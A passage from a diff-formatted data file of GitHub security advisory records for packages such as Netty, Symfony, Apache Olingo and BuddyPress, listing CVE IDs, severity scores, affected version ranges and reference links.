'https://github.com/ansible/ansible/commit/75288a89d0053d6df35c90863fb6c9542d89850e'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14864'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00026.html'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T02:19:23Z', 'nvd_published_at': '2020-01-02T15:15:00Z'}"
+1.4.0,GHSA-3j78-7m59-r7gv,2021-01-08T20:29:11Z,2020-02-24T17:18:26Z,,['CVE-2020-5244'],Private data exposure via REST API in BuddyPress,"In BuddyPress before 5.1.2, requests to a certain REST API endpoint can result in private user data getting exposed. Authentication is not needed.
+
+This has been patched in version 5.1.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'buddypress/buddypress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/buddypress/BuddyPress/security/advisories/GHSA-3j78-7m59-r7gv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5244'}, {'type': 'WEB', 'url': 'https://github.com/buddypress/BuddyPress/commit/39294680369a0c992290577a9d740f4a2f2c2ca3'}, {'type': 'WEB', 'url': 'https://buddypress.org/2020/01/buddypress-5-1-2/'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-24T17:18:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v4qh-6367-4cx2,2021-08-19T16:54:36Z,2020-02-04T22:38:38Z,,['CVE-2020-1925'],Server-Side Request Forgery (SSRF) in Apache Olingo,"Apache Olingo versions 4.0.0 to 4.7.0 provide the AsyncRequestWrapperImpl class which reads a URL from the Location header, and then sends a GET or DELETE request to this URL. It may allow to implement a SSRF attack. If an attacker tricks a client to connect to a malicious server, the server can make the client call any URL including internal resources which are not directly accessible by the attacker.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.olingo:odata-client-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.7.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1925'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/olingo-user/202001.mbox/%3CCAGSZ4d6HwpF2woOrZJg_d0SkHytXJaCtAWXa3ZtBn33WG0YFvw%40mail.gmail.com%3E'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T22:35:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cqqj-4p63-rrmm,2021-08-25T17:26:45Z,2020-02-21T18:55:24Z,,['CVE-2019-20444'],HTTP Request Smuggling in Netty,"HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an ""invalid fold.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.44'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20444'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/issues/9866'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/pull/9871'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/pull/9871/files#diff-e26989b9171ef22c27c9f7d80689cfb059d568c9bd10e75970d96c02d0654878'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0497'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0567'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0601'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0605'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0606'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0804'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0805'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0806'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0811'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9@%3Ccommon-commits.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4532-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-20T20:54:33Z', 'nvd_published_at': '2020-01-29T21:15:00Z'}"
+1.4.0,GHSA-xwgq-pcqx-hpmv,2021-08-19T16:56:45Z,2020-02-12T18:45:50Z,,['CVE-2019-19703'],URL Redirection to Untrusted Site (Open Redirect) in Ktor,"In Ktor through 1.2.6, the client resends data from the HTTP Authorization header to a redirect location.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ktor:ktor-client-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.2.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19703'}, {'type': 'WEB', 'url': 'https://github.com/ktorio/ktor/issues/1467'}, {'type': 'WEB', 'url': 'https://github.com/ktorio/ktor/commit/0c108156f45423d09014b47be810188629cb878f'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-11T17:33:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w4rc-rx25-8m86,2021-08-19T17:13:33Z,2020-02-12T18:44:16Z,,['CVE-2019-11325'],Improper Input Validation in Symfony,"An issue was discovered in Symfony before 4.2.12 and 4.3.x before 4.3.8. The VarExport component incorrectly escapes strings, allowing some specially crafted ones to escalate to execution of arbitrary PHP code. This is related to symfony/var-exporter.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/var-exporter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/var-exporter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11325'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-11325.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/var-exporter/CVE-2019-11325.yaml'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v4.3.8'}, {'type': 'WEB', 'url': 'https://github.com/symfony/var-exporter/compare/d8bf442...57e00f3'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/cve-2019-11325-fix-escaping-of-strings-in-varexporter'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/symfony-4-3-8-released'}, {'type': 'WEB', 'url': 'https://symfony.com/cve-2019-11325'}]","{'cwe_ids': ['CWE-116'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-11T20:39:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2gc7-w4hw-rr2m,2021-08-19T19:29:17Z,2020-02-28T01:10:17Z,,['CVE-2019-19634'],class.upload.php in verot.net omits .pht from the set of dangerous file extensions,"class.upload.php in verot.net class.upload through 1.0.3 and 2.x through 2.0.4, as used in the K2 extension for Joomla! and other products, omits .pht from the set of dangerous file extensions, a similar issue to CVE-2019-19576.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'verot/class.upload.php'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'verot/class.upload.php'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'last_affected': '2.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19634'}, {'type': 'WEB', 'url': 'https://github.com/jra89/CVE-2019-19634'}, {'type': 'WEB', 'url': 'https://github.com/verot/class.upload.php/blob/2.0.4/src/class.upload.php#L3068'}, {'type': 'WEB', 'url': 'https://medium.com/@jra8908/cve-2019-19634-arbitrary-file-upload-in-class-upload-php-ccaf9e13875e'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T16:03:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p5w7-qmq6-pmjr,2023-08-31T10:01:20Z,2020-02-26T19:55:32Z,,['CVE-2019-12413'],Users able to query database metadata in Apache Superset,"In Apache Incubator Superset before 0.31 user could query database metadata information from a database he has no access to, by using a specially crafted complex query.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.31.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12413'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/85ab04f8c52df8c353ecfa0ecd2ff27fc07fb8ab7566a754349806be%40%3Cdev.superset.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-APACHESUPERSET-558911'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T15:53:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-84cm-v6jp-gjmr,2021-08-19T17:14:36Z,2020-02-14T23:09:24Z,,['CVE-2019-10776'],OS command injection in git-diff-apply,"In ""index.js"" file line 240, the run command executes the git command with a user controlled variable called remoteUrl. This affects git-diff-apply all versions prior to 0.22.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'git-diff-apply'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.22.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.22.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10776'}, {'type': 'WEB', 'url': 'https://github.com/kellyselden/git-diff-apply/commit/106d61d3ae723b4257c2a13e67b95eb40a27e0b5'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GITDIFFAPPLY-540774'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GITDIFFAPPLY-540774,'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T19:30:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-477x-w7m6-c6ph,2021-08-19T16:52:56Z,2020-02-04T22:37:15Z,,['CVE-2019-17555'],Improper input validation in Apache Olingo,"The AsyncResponseWrapperImpl class in Apache Olingo versions 4.0.0 to 4.6.0 reads the Retry-After header and passes it to the Thread.sleep() method without any check. If a malicious server returns a huge value in the header, then it can help to implement a DoS attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.olingo:odata-client-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.6.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17555'}, {'type': 'WEB', 'url': 'https://github.com/apache/olingo-odata4/pull/61'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OLINGO-1411'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d65UmudJ_MQkFXEv9YY_wwZbRA3sgtNDzMoLM51Qh%3DRCA%40mail.gmail.com%3E'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T22:19:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cchx-mfrc-fwqr,2021-09-30T18:40:15Z,2020-02-12T18:45:08Z,,['CVE-2019-10911'],Improper authentication in Symfony,"In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, a vulnerability would allow an attacker to authenticate as a privileged user on sites with user registration and remember me login functionality enabled. This is related to symfony/security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.51'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.51'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.51'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10911'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/a29ce2817cf43bb1850cf6af114004ac26c7a081'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2019-10911.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2019-10911.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10911.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony '}, {'type': 'WEB', 'url': 'https://symfony.com/blog/cve-2019-10911-add-a-separator-in-the-remember-me-cookie-hash'}, {'type': 'WEB', 'url': 'https://symfony.com/cve-2019-10911'}, {'type': 'WEB', 'url': 'https://www.synology.com/security/advisory/Synology_SA_19_19'}]","{'cwe_ids': ['CWE-200', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-11T20:17:08Z', 'nvd_published_at': '2019-05-16T22:29:00Z'}"
+1.4.0,GHSA-7553-jr98-vx47,2022-04-22T17:29:45Z,2020-02-24T19:12:36Z,,['CVE-2020-7595'],libxml as used in Nokogiri has an infinite loop in a certain end-of-file situation,"xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.
